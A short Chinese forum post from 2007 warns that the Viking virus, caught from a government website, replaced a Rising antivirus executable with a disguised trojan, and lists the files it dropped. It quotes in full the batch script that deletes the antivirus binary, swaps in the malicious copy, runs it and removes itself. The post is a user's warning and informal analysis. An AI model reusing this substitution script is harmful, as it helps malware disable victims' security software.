打开一个带VIKING病毒的政府网站时中毒，它运行了以下BAT文件：

:try1
Del "C:\Program Files\Rising\AntiSpyware\runiep.exe"
if exist "C:\Program Files\Rising\AntiSpyware\runiep.exe" goto try1
ren "C:\Program Files\Rising\AntiSpyware\runiep.exe.exe" "runiep.exe"
if exist "C:\Program Files\Rising\AntiSpyware\runiep.exe.exe" goto try2
"C:\Program Files\Rising\AntiSpyware\runiep.exe"
:try2
del "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\$$a1A.bat"

结果是反复在WINDOWS目录中产生logo_.exe并建立一个文件夹uninstall内有runduL132.exe，还在IE目录中建立多个sy12.exe,.......,目前SY13。EXE和SY19。EXE瑞星尚不能杀除。

那个runiep.exe.exe可惜未抓到样品。。

本文发表于07-6-11,目的只是提醒大家：1、病毒越来越疯狂；2、实在找不到问题所在时不妨怀疑一下你最信任的--比如瑞星、卡卡，等等，是不是被病毒替换了。本文中所说的这个替代品只是在“驱动”里隐藏了自己，其他功能还真和卡卡一样的，好笑而且可怕啊。

那么也是新的VIKING了，因为上周五杀毒软件还什么都不能报出，而刚才已杀出成300个感染各个盘EXE的威金。

放在回收站的好多都已消失，sy13.exe,sy19.exe还在。